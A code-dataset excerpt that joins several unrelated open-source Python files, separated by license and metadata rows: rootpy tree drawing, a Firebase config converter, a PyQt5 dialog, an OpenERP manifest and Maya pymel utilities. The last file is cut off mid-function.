that the order should be "X:Y" so that the expression along the
first dimension identifies the location along the first axis, etc.
selection : str or rootpy.tree.Cut, optional (default="")
The cut expression. Only entries satisfying this selection are
included in the filled histogram.
options : str, optional (default="")
Draw options passed to ROOT.TTree.Draw
hist : ROOT.TH1, optional (default=None)
The histogram to be filled. If not specified, rootpy will attempt
to find what ROOT created and return that.
create_hist : bool (default=False)
If True and `hist`` is not specified and a histogram name is not
specified in the draw expression, then override ROOT's
default behaviour and fill a new histogram. ROOT will otherwise add
points to a TGraph or TPolyMarker3D if not drawing in more than
two dimensions.
kwargs : dict, optional
Remaining keword arguments are used to set the style attributes of
the histogram.
Returns
-------
If ``hist`` is specified, None is returned. If ``hist`` is left
unspecified, an attempt is made to retrieve the generated histogram
which is then returned.
"""
# Check that we have a valid draw expression and pick out components
exprmatch = re.match(BaseTree.DRAW_PATTERN, expression)
if not exprmatch:
raise ValueError(
"not a valid draw expression: `{0}`".format(expression))
# Reverse variable order to match order in hist constructor
exprdict = exprmatch.groupdict()
fields = exprdict['branches'].split(':')
num_dimensions = len(fields)
expression = ':'.join(fields[:3][::-1] + fields[3:])
if exprdict['redirect'] is not None:
expression += exprdict['redirect']
if not isinstance(selection, Cut):
# Let Cut handle any extra processing (i.e. ternary operators)
selection = Cut(selection)
graphics = 'goff' not in options
if hist is not None:
if not isinstance(hist, ROOT.TH1):
raise TypeError("Cannot draw into a `{0}`".format(type(hist)))
# Check that the dimensionality of the expression and object match
if num_dimensions != hist.GetDimension():
raise TypeError(
"The dimensionality of the expression `{0}` ({1:d}) "
"does not match the dimensionality of a `{2}`".format(
expression, num_dimensions, hist.__class__.__name__))
# Handle graphics ourselves
if graphics:
if options:
options += ' '
options += 'goff'
if exprdict['name'] is None:
# Draw into histogram supplied by user
expression = '{0}>>+{1}'.format(expression, hist.GetName())
else:
if exprdict['name'] != hist.GetName():
# If the user specified a name to draw into then check that
# this is consistent with the specified object.
raise ValueError(
"The name specified in the draw "
"expression `{0}` does not match the "
"name of the specified object `{1}`".format(
exprdict['name'],
hist.GetName()))
# Check that binning is not specified
if exprdict['binning'] is not None:
raise ValueError(
"When specifying the object to draw into, do not "
"specify a binning in the draw expression")
else:
if create_hist and exprdict['name'] is None:
if num_dimensions > 4:
raise ValueError(
"Cannot create a histogram for expressions with "
"more than 4 dimensions")
newname = uuid.uuid4().hex
expression += '>>{0}'.format(newname)
exprdict['name'] = newname
pad = ROOT.gPad.func()
own_pad = False
if graphics and not pad:
# Create a new canvas if one doesn't exist yet
own_pad = True
pad = Canvas()
# Note: TTree.Draw() pollutes gDirectory, make a temporary one
with thread_specific_tmprootdir():
if hist is not None:
# If a custom histogram is specified (i.e, it's not being
# created root side), then temporarily put it into the
# temporary thread-specific directory.
context = set_directory(hist)
else:
context = do_nothing()
with context:
super(BaseTree, self).Draw(expression, selection, options)
if hist is None:
# Retrieve histogram made by TTree.Draw
if num_dimensions == 1 or exprdict['name'] is not None:
# a TH1
hist = asrootpy(self.GetHistogram(), warn=False)
elif num_dimensions == 2:
# a TGraph
hist = asrootpy(pad.GetPrimitive('Graph'), warn=False)
else:
# ROOT: For a three and four dimensional Draw the TPolyMarker3D
# is unnamed, and cannot be retrieved. Why, ROOT?
log.warning(
"Cannot retrieve the TPolyMarker3D for "
"3D and 4D expressions")
if graphics and own_pad:
# Since we cannot access the TPolyMarker3D we use self to
# keep the canvas alive
keepalive(self, pad)
if hist: # is not None
if isinstance(hist, Plottable):
hist.decorate(**kwargs)
# ROOT, don't try to delete this object! (See issue #277)
hist.SetBit(ROOT.kCanDelete, False)
if graphics:
if own_pad:
# The usual bug is that the histogram is garbage
# collected and we want the canvas to keep the
# histogram alive, but here the canvas has been
# created locally and we are returning the histogram,
# so we want the histogram to keep the canvas alive.
keepalive(hist, pad)
# Redraw the histogram since we may have specified style
# attributes in **kwargs
hist.Draw()
if graphics:
pad.Modified()
pad.Update()
return hist
def to_array(self, *args, **kwargs):
"""
Convert this tree into a NumPy structured array
"""
from root_numpy import tree2array
return tree2array(self, *args, **kwargs)
@snake_case_methods
class Tree(BaseTree, QROOT.TTree):
"""
Inherits from TTree so all regular TTree methods are available
but certain methods (i.e. Draw) have been overridden
to improve usage in Python.
Parameters
----------
name : str, optional (default=None)
The Tree name (a UUID if None)
title : str, optional (default=None)
The Tree title (empty string if None)
model : TreeModel, optional (default=None)
If specified then this TreeModel will be used to create the branches
"""
_ROOT = QROOT.TTree
@method_file_check
def __init__(self, name=None, title=None, model=None):
super(Tree, self).__init__(name=name, title=title)
self._buffer = TreeBuffer()
if model is not None:
if not issubclass(model, TreeModel):
raise TypeError("the model must subclass TreeModel")
self.set_buffer(model(), create_branches=True)
self._post_init()
def Fill(self, reset=False):
"""
Fill the Tree with the current values in the buffer
Parameters
----------
reset : bool, optional (default=False)
Reset the values in the buffer to their default values after
filling.
"""
super(Tree, self).Fill()
# reset all branches
if reset:
self._buffer.reset()
@snake_case_methods
class Ntuple(BaseTree, QROOT.TNtuple):
"""
Inherits from TNtuple so all regular TNtuple/TTree methods are available
but certain methods (i.e. Draw) have been overridden
to improve usage in Python.
Parameters
----------
varlist : list of str
A list of the field names
name : str, optional (default=None)
The Ntuple name (a UUID if None)
title : str, optional (default=None)
The Ntuple title (empty string if None)
bufsize : int, optional (default=32000)
Basket buffer size
"""
_ROOT = QROOT.TNtuple
@method_file_check
def __init__(self, varlist, name=None, title=None, bufsize=32000):
super(Ntuple, self).__init__(':'.join(varlist), bufsize,
name=name,
title=title)
self._post_init()
| gpl-3.0 | -4,759,378,811,842,880,000 | 36.006623 | 79 | 0.547691 | false |
Jason-Zhao-Jie/MagicTower | Assets/Firebase/Editor/generate_xml_from_google_services_json.py | 1 | 13865 | #!/usr/bin/python
# Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Stand-alone implementation of the Gradle Firebase plugin.
Converts the services json file to xml:
https://googleplex-android.googlesource.com/platform/tools/base/+/studio-master-dev/build-system/google-services/src/main/groovy/com/google/gms/googleservices
"""
__author__ = 'Wouter van Oortmerssen'
import argparse
import json
import os
import sys
from xml.etree import ElementTree
# Input filename if it isn't set.
DEFAULT_INPUT_FILENAME = 'app/google-services.json'
# Output filename if it isn't set.
DEFAULT_OUTPUT_FILENAME = 'res/values/googleservices.xml'
# Input filename for .plist files, if it isn't set.
DEFAULT_PLIST_INPUT_FILENAME = 'GoogleService-Info.plist'
# Output filename for .json files, if it isn't set.
DEFAULT_JSON_OUTPUT_FILENAME = 'google-services-desktop.json'
# Indicates a web client in the oauth_client list.
OAUTH_CLIENT_TYPE_WEB = 3
def read_xml_value(xml_node):
"""Utility method for reading values from the plist XML.
Args:
xml_node: An ElementTree node, that contains a value.
Returns:
The value of the node, or None, if it could not be read.
"""
if xml_node.tag == 'string':
return xml_node.text
elif xml_node.tag == 'integer':
return int(xml_node.text)
elif xml_node.tag == 'real':
return float(xml_node.text)
elif xml_node.tag == 'false':
return 0
elif xml_node.tag == 'true':
return 1
else:
# other types of input are ignored. (data, dates, arrays, etc.)
return None
def construct_plist_dictionary(xml_root):
"""Constructs a dictionary of values based on the contents of a plist file.
Args:
xml_root: An ElementTree node, that represents the root of the xml file
that is to be parsed. (Which should be a dictionary containing
key-value pairs of the properties that need to be extracted.)
Returns:
A dictionary, containing key-value pairs for all (supported) entries in the
node.
"""
xml_dict = xml_root.find('dict')
if xml_dict is None:
return None
plist_dict = {}
i = 0
while i < len(xml_dict):
if xml_dict[i].tag == 'key':
key = xml_dict[i].text
i += 1
if i < len(xml_dict):
value = read_xml_value(xml_dict[i])
if value is not None:
plist_dict[key] = value
i += 1
return plist_dict
def construct_google_services_json(xml_dict):
"""Constructs a google services json file from a dictionary.
Args:
xml_dict: A dictionary of all the key/value pairs that are needed for the
output json file.
Returns:
A string representing the output json file.
"""
try:
json_struct = {
'project_info': {
'project_number': xml_dict['GCM_SENDER_ID'],
'firebase_url': xml_dict['DATABASE_URL'],
'project_id': xml_dict['PROJECT_ID'],
'storage_bucket': xml_dict['STORAGE_BUCKET']
},
'client': [{
'client_info': {
'mobilesdk_app_id': xml_dict['GOOGLE_APP_ID'],
'android_client_info': {
'package_name': xml_dict['BUNDLE_ID']
}
},
'oauth_client': [{
'client_id': xml_dict['CLIENT_ID'],
}],
'api_key': [{
'current_key': xml_dict['API_KEY']
}],
'services': {
'analytics_service': {
'status': xml_dict['IS_ANALYTICS_ENABLED']
},
'appinvite_service': {
'status': xml_dict['IS_APPINVITE_ENABLED']
}
}
},],
'configuration_version':
'1'
}
return json.dumps(json_struct, indent=2)
except KeyError as e:
sys.stderr.write('Could not find key in plist file: [%s]\n' % (e.args[0]))
return None
def convert_plist_to_json(plist_string, input_filename):
"""Converts an input plist string into a .json file and saves it.
Args:
plist_string: The contents of the loaded plist file.
input_filename: The file name that the plist data was read from.
Returns:
the converted string, or None if there were errors.
"""
try:
root = ElementTree.fromstring(plist_string)
except ElementTree.ParseError:
sys.stderr.write('Error parsing file %s.\n'
'It does not appear to be valid XML.\n' % (input_filename))
return None
plist_dict = construct_plist_dictionary(root)
if plist_dict is None:
sys.stderr.write('In file %s, could not locate a top-level \'dict\' '
'element.\n'
'File format should be plist XML, with a top-level '
'dictionary containing project settings as key-value '
'pairs.\n' % (input_filename))
return None
json_string = construct_google_services_json(plist_dict)
return json_string
def gen_string(parent, name, text):
"""Generate one <string /> element and put into the list of keeps.
Args:
parent: The object that will hold the string.
name: The name to store the string under.
text: The text of the string.
"""
if text:
prev = parent.get('tools:keep', '')
if prev:
prev += ','
parent.set('tools:keep', prev + '@string/' + name)
child = ElementTree.SubElement(parent, 'string', {
'name': name,
'translatable': 'false'
})
child.text = text
def indent(elem, level=0):
"""Recurse through XML tree and add indentation.
Args:
elem: The element to recurse over
level: The current indentation level.
"""
i = '\n' + level*' '
if elem is not None:
if not elem.text or not elem.text.strip():
elem.text = i + ' '
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def main():
parser = argparse.ArgumentParser(
description=((
'Converts a Firebase %s into %s similar to the Gradle plugin, or '
'converts a Firebase %s into a %s suitible for use on desktop apps.' %
(DEFAULT_INPUT_FILENAME, DEFAULT_OUTPUT_FILENAME,
DEFAULT_PLIST_INPUT_FILENAME, DEFAULT_JSON_OUTPUT_FILENAME))))
parser.add_argument('-i', help='Override input file name',
metavar='FILE', required=False)
parser.add_argument('-o', help='Override destination file name',
metavar='FILE', required=False)
parser.add_argument('-p', help=('Package ID to select within the set of '
'packages in the input file. If this is '
'not specified, the first package in the '
'input file is selected.'))
parser.add_argument('-l', help=('List all package IDs referenced by the '
'input file. If this is specified, '
'the output file is not created.'),
action='store_true', default=False, required=False)
parser.add_argument('-f', help=('Print project fields from the input file '
'in the form \'name=value\\n\' for each '
'field. If this is specified, the output '
'is not created.'),
action='store_true', default=False, required=False)
parser.add_argument(
'--plist',
help=(
'Specifies a plist file to convert to a JSON configuration file. '
'If this is enabled, the script will expect a .plist file as input, '
'which it will convert into %s file. The output file is '
'*not* suitable for use with Firebase on Android.' %
(DEFAULT_JSON_OUTPUT_FILENAME)),
action='store_true',
default=False,
required=False)
args = parser.parse_args()
if args.plist:
input_filename = DEFAULT_PLIST_INPUT_FILENAME
output_filename = DEFAULT_JSON_OUTPUT_FILENAME
else:
input_filename = DEFAULT_INPUT_FILENAME
output_filename = DEFAULT_OUTPUT_FILENAME
if args.i:
input_filename = args.i
if args.o:
output_filename = args.o
with open(input_filename, 'r') as ifile:
file_string = ifile.read()
json_string = None
if args.plist:
json_string = convert_plist_to_json(file_string, input_filename)
if json_string is None:
return 1
jsobj = json.loads(json_string)
else:
jsobj = json.loads(file_string)
root = ElementTree.Element('resources')
root.set('xmlns:tools', 'http://schemas.android.com/tools')
project_info = jsobj.get('project_info')
if project_info:
gen_string(root, 'firebase_database_url', project_info.get('firebase_url'))
gen_string(root, 'gcm_defaultSenderId', project_info.get('project_number'))
gen_string(root, 'google_storage_bucket',
project_info.get('storage_bucket'))
gen_string(root, 'project_id', project_info.get('project_id'))
if args.f:
if not project_info:
sys.stderr.write('No project info found in %s.' % input_filename)
return 1
for field, value in project_info.iteritems():
sys.stdout.write('%s=%s\n' % (field, value))
return 0
packages = set()
client_list = jsobj.get('client')
if client_list:
# Search for the user specified package in the file.
selected_package_name = ''
selected_client = client_list[0]
find_package_name = args.p
for client in client_list:
package_name = client.get('client_info', {}).get(
'android_client_info', {}).get('package_name', '')
if not package_name:
package_name = client.get('oauth_client', {}).get(
'android_info', {}).get('package_name', '')
if package_name:
if not selected_package_name:
selected_package_name = package_name
selected_client = client
if package_name == find_package_name:
selected_package_name = package_name
selected_client = client
packages.add(package_name)
if args.p and selected_package_name != find_package_name:
sys.stderr.write('No packages found in %s which match the package '
'name %s\n'
'\n'
'Found the following:\n'
'%s\n' % (input_filename, find_package_name,
'\n'.join(packages)))
return 1
client_api_key = selected_client.get('api_key')
if client_api_key:
client_api_key0 = client_api_key[0]
gen_string(root, 'google_api_key', client_api_key0.get('current_key'))
gen_string(root, 'google_crash_reporting_api_key',
client_api_key0.get('current_key'))
client_info = selected_client.get('client_info')
if client_info:
gen_string(root, 'google_app_id', client_info.get('mobilesdk_app_id'))
oauth_client_list = selected_client.get('oauth_client')
if oauth_client_list:
for oauth_client in oauth_client_list:
client_type = oauth_client.get('client_type')
client_id = oauth_client.get('client_id')
if client_type and client_type == OAUTH_CLIENT_TYPE_WEB and client_id:
gen_string(root, 'default_web_client_id', client_id)
# Only include the first matching OAuth web client ID.
break
services = selected_client.get('services')
if services:
ads_service = services.get('ads_service')
if ads_service:
gen_string(root, 'test_banner_ad_unit_id',
ads_service.get('test_banner_ad_unit_id'))
gen_string(root, 'test_interstitial_ad_unit_id',
ads_service.get('test_interstitial_ad_unit_id'))
analytics_service = services.get('analytics_service')
if analytics_service:
analytics_property = analytics_service.get('analytics_property')
if analytics_property:
gen_string(root, 'ga_trackingId',
analytics_property.get('tracking_id'))
# enable this once we have an example if this service being present
# in the json data:
maps_service_enabled = False
if maps_service_enabled:
maps_service = services.get('maps_service')
if maps_service:
maps_api_key = maps_service.get('api_key')
if maps_api_key:
for k in range(0, len(maps_api_key)):
# generates potentially multiple of these keys, which is
# the same behavior as the java plugin.
gen_string(root, 'google_maps_key',
maps_api_key[k].get('maps_api_key'))
tree = ElementTree.ElementTree(root)
indent(root)
if args.l:
for package in packages:
if package:
sys.stdout.write(package + '\n')
else:
path = os.path.dirname(output_filename)
if path and not os.path.exists(path):
os.makedirs(path)
if not args.plist:
tree.write(output_filename, 'utf-8', True)
else:
with open(output_filename, 'w') as ofile:
ofile.write(json_string)
return 0
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | 2,530,400,691,713,250,300 | 33.150246 | 158 | 0.60714 | false |
sealcode/gpandoc | ui/recipe_ui.py | 1 | 3014 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'recipe.ui'
#
# Created by: PyQt5 UI code generator 5.7.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(355, 478)
self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout.setObjectName("verticalLayout")
self.vertical_layout_1 = QtWidgets.QVBoxLayout()
self.vertical_layout_1.setObjectName("vertical_layout_1")
self.label_1 = QtWidgets.QLabel(Dialog)
self.label_1.setObjectName("label_1")
self.vertical_layout_1.addWidget(self.label_1)
self.combo_box_1 = QtWidgets.QComboBox(Dialog)
self.combo_box_1.setObjectName("combo_box_1")
self.vertical_layout_1.addWidget(self.combo_box_1)
self.verticalLayout.addLayout(self.vertical_layout_1)
self.vertical_layout_2 = QtWidgets.QVBoxLayout()
self.vertical_layout_2.setObjectName("vertical_layout_2")
self.scroll_1 = QtWidgets.QScrollArea(Dialog)
self.scroll_1.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.scroll_1.setWidgetResizable(True)
self.scroll_1.setObjectName("scroll_1")
self.content_1 = QtWidgets.QWidget()
self.content_1.setGeometry(QtCore.QRect(0, 0, 300, 378))
self.content_1.setMaximumSize(QtCore.QSize(300, 600))
self.content_1.setObjectName("content_1")
self.label_2 = QtWidgets.QLabel(self.content_1)
self.label_2.setGeometry(QtCore.QRect(8, 3, 301, 421))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_2.sizePolicy().hasHeightForWidth())
self.label_2.setSizePolicy(sizePolicy)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName("label_2")
self.scroll_1.setWidget(self.content_1)
self.vertical_layout_2.addWidget(self.scroll_1)
self.button_box_1 = QtWidgets.QDialogButtonBox(Dialog)
self.button_box_1.setOrientation(QtCore.Qt.Horizontal)
self.button_box_1.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.button_box_1.setObjectName("button_box_1")
self.vertical_layout_2.addWidget(self.button_box_1)
self.verticalLayout.addLayout(self.vertical_layout_2)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Wybór przepisu"))
self.label_1.setText(_translate("Dialog", "Lista przepisów:"))
self.label_2.setText(_translate("Dialog", "TextLabel"))
| lgpl-3.0 | -7,895,148,468,539,092,000 | 47.580645 | 109 | 0.701527 | false |
Micronaet/micronaet-trip | account_trip_edi_c5/__openerp__.py | 1 | 1740 | ###############################################################################
#
# Copyright (C) 2001-2014 Micronaet SRL (<http://www.micronaet.it>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
'name': 'Account trip - EDI order import procedure for Company 5',
'version': '0.1',
'category': 'EDI',
'description': """
Import function for load EDI files
this is a model of importation for Company 5
This type of module are linked to edi.company for parametrize
function for importation.
Import procedure is in account_trip_edi
""",
'author': 'Micronaet S.r.l. - Nicola Riolini',
'website': 'http://www.micronaet.it',
'license': 'AGPL-3',
'depends': [
'base',
'account_trip_edi',
],
'init_xml': [],
'demo': [],
'data': [
'security/ir.model.access.csv',
'data/edi_company_importation.xml'
],
'active': False,
'installable': True,
'auto_install': False,
}
| agpl-3.0 | -7,736,994,042,556,643,000 | 36.021277 | 79 | 0.577586 | false |
SqueezeStudioAnimation/omtk | python/omtk/libs/libPymel.py | 1 | 14241 | import logging
import pymel.core as pymel
from maya import OpenMaya
#
# A PyNodeChain is a special pymel-related object that act exactly like a standard array.
# However it allow us to have more bells and whistles.
#
def is_valid_PyNode(val):
return (val and hasattr(val, 'exists') and val.exists()) if val else None
def distance_between_nodes(x, y):
"""
Return the distance between two pynodes.
"""
ax, ay, az = x.getTranslation(space="world")
bx, b, bz = y.getTranslation(space="world")
return ((ax - bx) ** 2 + (ay - b) ** 2 + (az - bz) ** 2) ** 0.5
def distance_between_vectors(a, b):
"""
http://darkvertex.com/wp/2010/06/05/python-distance-between-2-vectors/
"""
return ((a.x - b.x) ** 2 + (a.y - b.y) ** 2 + (a.z - b.z) ** 2) ** 0.5
def is_child_of(node, potential_parent):
while node:
if node == potential_parent:
return True
node = node.getParent()
return False
class PyNodeChain(list):
"""A container for manipulating lists of hosts"""
@property
def start(self):
return next(iter(self), None)
@property
def end(self):
return self[-1] if len(self) > 0 else None
@property
def chain(self):
return self
def duplicate(self):
# Hack - Convert self into list even if self is a list to prevent duplicate self parameter in pymel.duplicate
new_chain = pymel.duplicate(list(self), renameChildren=True, parentOnly=True)
return PyNodeChain(new_chain)
def setParent(self, new_parent, **kwargs):
for node in self:
if node != new_parent and node.getParent() != new_parent:
node.setParent(new_parent, **kwargs)
# todo: convert to property?
def length(self):
length = 0
for i in range(len(self) - 1):
head = self[i]
tail = self[i + 1]
length += distance_between_nodes(head, tail)
return length
# get the first pynode that have the attr
def __getattr__(self, key):
logging.warning("Searching unknow attribute {key} in {self}", key=key, self=self)
first_node = next((node for node in self.__dict__['_list'] if hasattr(node, key)), None)
if first_node is not None:
return getattr(first_node, key)
raise AttributeError
# set all the pynodes that have the attr
def __setattr__(self, key, value):
for node in self:
try:
setattr(node, key, value)
except Exception, e:
logging.error(str(e))
def duplicate_chain(chain):
new_chain = pymel.duplicate(chain, renameChildren=True, parentOnly=True)
return PyNodeChain(new_chain)
def get_num_parents(obj):
num_parents = -1
while obj is not None:
obj = obj.getParent()
num_parents += 1
return num_parents
def get_chains_from_objs(objs):
"""
Take an arbitraty collection of joints and sort them in hyerarchies represented by lists.
"""
chains = []
objs = sorted(objs, key=get_num_parents)
for obj in objs:
parent = obj.getParent()
if parent not in objs:
chains.append([obj])
else:
for chain in chains:
if parent in chain:
chain.append(obj)
return [PyNodeChain(chain) for chain in chains]
def iter_parents(obj):
while obj.getParent() is not None:
obj = obj.getParent()
yield obj
def get_parents(obj):
return list(iter_parents(obj))
'''
parents = []
while obj.getParent() is not None:
parent = obj.getParent()
parents.append(parent)
obj = parent
return parents
'''
def get_common_parents(objs):
"""
Return the first parent that all provided objects share.
:param objs: A list of pymel.PyNode instances.
:return: A pymel.PyNode instance.
"""
parent_sets = set()
for jnt in objs:
parent_set = set(get_parents(jnt))
if not parent_sets:
parent_sets = parent_set
else:
parent_sets &= parent_set
result = next(iter(reversed(sorted(parent_sets, key=get_num_parents))), None)
if result and result in objs:
result = result.getParent()
return result
class Tree(object):
__slots__ = ('val', 'children', 'parent')
def __init__(self, val):
self.val = val
self.children = []
self.parent = None
def append(self, tree):
self.children.append(tree)
tree.parent = self
def __repr__(self):
return '<Tree {0}>'.format(self.val)
def get_tree_from_objs(objs, sort=False):
"""
Sort all provided objects in a tree fashion.
Support missing objects between hierarchy.
Note that tree root value will always be None, representing the root node.
"""
dagpaths = sorted([obj.fullPath() for obj in objs])
root = Tree(None)
def dag_is_child_of(dag_parent, dag_child):
return dag_child.startswith(dag_parent + '|')
last_knot = root
for dagpath in dagpaths:
knot = Tree(dagpath)
# Resolve the new knot parent
p = last_knot
while not (p.val is None or dag_is_child_of(p.val, dagpath)):
p = p.parent
p.append(knot)
# Save the last knot, since we are iterating in alphabetical order,
# we can assume that the next knot parent can be found using this knot.
last_knot = knot
return root
#
# ls() reimplementations
#
def ls(*args, **kwargs):
return PyNodeChain(pymel.ls(*args, **kwargs))
# Wrapper for pymel.ls that return only objects without parents.
def ls_root(*args, **kwargs):
# TODO: Better finding of the root joint
return PyNodeChain(filter(lambda x: x.getParent() is None or type(x.getParent()) != pymel.nt.Joint,
iter(pymel.ls(*args, **kwargs))))
def ls_root_anms(pattern='anm*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
def ls_root_geos(pattern='geo*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
def ls_root_rigs(pattern='rig*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
def ls_root_jnts(pattern='jnt*', **kwargs):
return ls_root(pattern, type='transform', **kwargs)
#
# isinstance() reimplementation
#
# Class check for transform PyNodes
def isinstance_of_transform(obj, cls=pymel.nodetypes.Transform):
return isinstance(obj, cls)
# Class check for shape PyNodes
def isinstance_of_shape(obj, cls=pymel.nodetypes.Shape):
if isinstance(obj, pymel.nodetypes.Transform):
return any((shape for shape in obj.getShapes() if isinstance(shape, cls)))
elif isinstance(obj, pymel.nodetypes.Shape):
return isinstance(obj, cls)
def create_zero_grp(obj):
zero_grp = pymel.createNode('transform')
new_name = obj.name() + '_' + 'zero_grp'
zero_grp.rename(new_name)
# Note: Removed for performance
zero_grp.setMatrix(obj.getMatrix(worldSpace=True))
parent = obj.getParent()
if parent:
zero_grp.setParent(parent)
obj.setParent(zero_grp)
return zero_grp
def zero_out_objs(objs):
for o in objs:
create_zero_grp(o)
#
# pymel.datatypes extensions.
#
class Segment(object):
"""
In Maya there's no class to represent a segment.
This is the pymel.datatypes.Segment I've always wanted.
"""
def __init__(self, pos_s, pos_e):
self.pos_s = pos_s
self.pos_e = pos_e
# self.pos_s = numpy.array(pos_s.x, pos_s.y, pos_s.z)
# self.pos_e = numpy.array(pos_e.x, pos_e.y, pos_e.z)
def closest_point(self, p):
"""
http://stackoverflow.com/questions/3120357/get-closest-point-to-a-line
"""
a = self.pos_s
b = self.pos_e
a_to_p = p - a
a_to_b = b - a
ab_length = a_to_b.length()
ap_length = a_to_p.length()
a_to_p_norm = a_to_p.normal()
a_to_b_norm = a_to_b.normal()
atp_dot_atb = a_to_p_norm * (a_to_b_norm) # dot product
dist_norm = atp_dot_atb * ap_length / ab_length
return pymel.datatypes.Vector(
a.x + a_to_b.x * dist_norm,
a.y + a_to_b.y * dist_norm,
a.z + a_to_b.z * dist_norm
)
def closest_point_normalized_distance(self, p, epsilon=0.001):
"""
Same things as .closest_point but only return the distance relative from the length of a to b.
Available for optimisation purpose.
"""
a = self.pos_s
b = self.pos_e
a_to_p = p - a
a_to_b = b - a
ab_length = a_to_b.length()
ap_length = a_to_p.length()
a_to_p_norm = a_to_p.normal()
a_to_b_norm = a_to_b.normal()
atp_dot_atb = a_to_p_norm * a_to_b_norm
return (atp_dot_atb * ap_length / ab_length) if abs(ab_length) > epsilon else 0.0
class SegmentCollection(object):
def __init__(self, segments=None):
if segments is None:
segments = []
self.segments = segments
self.knots = [segment.pos_s for segment in self.segments]
self.knots.append(self.segments[-1].pos_e)
def closest_segment(self, pos):
bound_min = -0.000000000001 # Damn float imprecision
bound_max = 1.0000000000001 # Damn float imprecision
num_segments = len(self.segments)
for i, segment in enumerate(self.segments):
distance_normalized = segment.closest_point_normalized_distance(pos)
if bound_min <= distance_normalized <= bound_max:
return segment, distance_normalized
elif i == 0 and distance_normalized < bound_min: # Handle out-of-bound
return segment, 0.0
elif i == (num_segments - 1) and distance_normalized > bound_max: # Handle out-of-bound
return segment, 1.0
raise Exception("Can't resolve segment for {0}".format(pos))
def closest_segment_index(self, pos):
closest_segment, ratio = self.closest_segment(pos)
index = self.segments.index(closest_segment)
return index, ratio
def get_knot_weights(self, dropoff=1.0, normalize=True):
num_knots = len(self.knots)
knots_weights = []
for i, knot in enumerate(self.knots):
if i == 0:
weights = [0] * num_knots
weights[0] = 1.0
elif i == (num_knots - 1):
weights = [0] * num_knots
weights[-1] = 1.0
else:
weights = []
total_weight = 0.0
for j in range(num_knots):
distance = abs(j - i)
weight = max(0, 1.0 - (distance / dropoff))
total_weight += weight
weights.append(weight)
weights = [weight / total_weight for weight in weights]
knots_weights.append(weights)
return knots_weights
'''
def get_weights(self, pos, dropoff=1.0, normalize=True):
# Compute the 'SegmentCollection' relative ratio and return the weight for each knots.
closest_segment, relative_ratio = self.closest_segment(pos)
index = self.segments.index(closest_segment)
absolute_ratio = relative_ratio + index
weights = []
total_weights = 0.0
for segment_ratio in range(len(self.knots)):
#segment_ratio += 0.5 # center of the joint
#print segment_ratio, absolute_ratio
distance = abs(segment_ratio - absolute_ratio)
weight = max(0, 1.0-(distance/dropoff))
# Apply cubic interpolation for greater results.
#weight = interp_cubic(weight)
total_weights += weight
weights.append(weight)
if normalize:
weights = [weight / total_weights for weight in weights]
return weights
'''
@classmethod
def from_transforms(cls, objs):
segments = []
num_objs = len(objs)
for i in range(num_objs - 1):
obj_s = objs[i]
obj_e = objs[i + 1]
mfn_transform_s = obj_s.__apimfn__()
mfn_transform_e = obj_e.__apimfn__()
pos_s = OpenMaya.MVector(mfn_transform_s.getTranslation(OpenMaya.MSpace.kWorld))
pos_e = OpenMaya.MVector(mfn_transform_e.getTranslation(OpenMaya.MSpace.kWorld))
segment = Segment(pos_s, pos_e)
segments.append(segment)
return cls(segments)
@classmethod
def from_positions(cls, positions):
segments = []
num_positions = len(positions)
for i in range(num_positions - 1):
pos_s = positions[i]
pos_e = positions[i + 1]
segment = Segment(pos_s, pos_e)
segments.append(segment)
return cls(segments)
def get_rotation_from_matrix(tm):
"""
Bypass pymel bug
see https://github.com/LumaPictures/pymel/issues/355
"""
return pymel.datatypes.TransformationMatrix(tm).rotate
def makeIdentity_safe(obj, translate=False, rotate=False, scale=False, apply=False, **kwargs):
"""
Extended pymel.makeIdentity method that won't crash for idiotic reasons.
"""
from . import libAttr
affected_attrs = []
# Ensure the shape don't have any extra transformation.
if apply:
if translate:
libAttr.unlock_translation(obj)
affected_attrs.extend([
obj.translate, obj.translateX, obj.translateY, obj.translateZ
])
if rotate:
libAttr.unlock_rotation(obj)
affected_attrs.extend([
obj.rotate, obj.rotateX, obj.rotateY, obj.rotateZ
])
if scale:
libAttr.unlock_scale(obj)
affected_attrs.extend([
obj.scale, obj.scaleX, obj.scaleY, obj.scaleZ
])
# Make identify will faile if attributes are connected...
